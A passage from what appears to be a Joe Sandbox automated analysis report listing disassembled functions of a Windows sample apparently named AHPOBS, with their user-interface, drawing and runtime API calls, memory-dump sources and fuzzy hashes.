                                      • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                      • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                      • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                      Function 0044900D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                      • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                      • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                      • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                      • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: MessageSend$LongWindow$InvalidateRect
                                      • String ID:
                                      • API String ID: 1976402638-0
                                      • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                      • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                      • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                      • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                      Function 00440A0D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                      • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                      • ShowWindow.USER32(?,00000000), ref: 00440B18
                                      • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                      • EnableWindow.USER32(?,00000001), ref: 00440B50
                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Window$Show$Enable$MessageSend
                                      • String ID:
                                      • API String ID: 642888154-0
                                      • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                      • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                      • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                      • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                      Function 00448804 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                      • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                      • EnableWindow.USER32(?,00000001), ref: 00448B72
                                      • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                      • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                      • EnableWindow.USER32(?,00000001), ref: 00448C09
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Window$Enable$Show$MessageSend
                                      • String ID:
                                      • API String ID: 1871949834-0
                                      • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                      • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                      • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                      • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                      Function 00441078 Relevance: 9.1, APIs: 6, Instructions: 86COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                      • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                      • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                      • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                      Function 00471A38 Relevance: 9.1, APIs: 6, Instructions: 79windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                      • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                      • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                      • SendMessageW.USER32 ref: 00471AE3
                                      • DestroyIcon.USER32(?), ref: 00471AF4
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                      • String ID:
                                      • API String ID: 3611059338-0
                                      • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                      • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                      • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                      • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                      Function 00455616 Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: DestroyWindow$DeleteObject$IconMove
                                      • String ID:
                                      • API String ID: 1640429340-0
                                      • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                      • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                      • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                      • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                      Function 0044389A Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                      • _wcslen.LIBCMT ref: 004438CD
                                      • _wcslen.LIBCMT ref: 004438E6
                                      • _wcstok.LIBCMT ref: 004438F8
                                      • _wcslen.LIBCMT ref: 0044390C
                                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                      • _wcstok.LIBCMT ref: 00443931
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                      • String ID:
                                      • API String ID: 3632110297-0
                                      • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                      • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                      • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                      • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                      Function 00455168 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Destroy$DeleteMenuObject$IconWindow
                                      • String ID:
                                      • API String ID: 752480666-0
                                      • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                      • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                      • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                      • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                      Function 004552FA Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                      • String ID:
                                      • API String ID: 3275902921-0
                                      • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                      • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                      • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                      • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                      Function 004556C8 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                      • String ID:
                                      • API String ID: 3275902921-0
                                      • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                      • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                      • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                      • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                      Function 004331A2 Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                      • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                      • String ID:
                                      • API String ID: 2833360925-0
                                      • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                      • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                      • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                      • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                      Function 0045559F Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32 ref: 004555C7
                                      • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                      • DeleteObject.GDI32(?), ref: 00455736
                                      • DeleteObject.GDI32(?), ref: 00455744
                                      • DestroyIcon.USER32(?), ref: 00455752
                                      • DestroyWindow.USER32(?), ref: 00455760
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                      • String ID:
                                      • API String ID: 3691411573-0
                                      • Opcode ID: da631fe096052ef5bd48ea011818ab2276afcb1e35ba95b92101ff2cabc01c83
                                      • Instruction ID: ee39a3c17b45488341a0d6beee4a1abd3419bb98b1a9b0cd73eda499273a4889
                                      • Opcode Fuzzy Hash: da631fe096052ef5bd48ea011818ab2276afcb1e35ba95b92101ff2cabc01c83
                                      • Instruction Fuzzy Hash: C011B6B12047419BC710DF65EDC8A2A77A8BF18322F10066AFD50DB2D2D779D849C729
                                      Function 00447275 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                        • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                        • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                      • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                      • LineTo.GDI32(?,?,?), ref: 004472AC
                                      • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                      • LineTo.GDI32(?,?,?), ref: 004472C6
                                      • EndPath.GDI32(?), ref: 004472D6
                                      • StrokePath.GDI32(?), ref: 004472E4
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                      • String ID:
                                      • API String ID: 372113273-0
                                      • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                      • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                      • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                      • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                      Function 00417082 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __getptd.LIBCMT ref: 0041708E
                                        • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                        • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                      • __amsg_exit.LIBCMT ref: 004170AE
                                      • __lock.LIBCMT ref: 004170BE
                                      • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                      • _free.LIBCMT ref: 004170EE
                                      • InterlockedIncrement.KERNEL32(00B317F0), ref: 00417106
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                      • String ID:
                                      • API String ID: 3470314060-0
                                      • Opcode ID: 24516f4010ce0b93e8566e6a8de288d1d1524a4de8e6263f522fbb499f39661f
                                      • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                      • Opcode Fuzzy Hash: 24516f4010ce0b93e8566e6a8de288d1d1524a4de8e6263f522fbb499f39661f
                                      • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                      Function 0044B63B Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                      • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                      • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                      • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                        • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
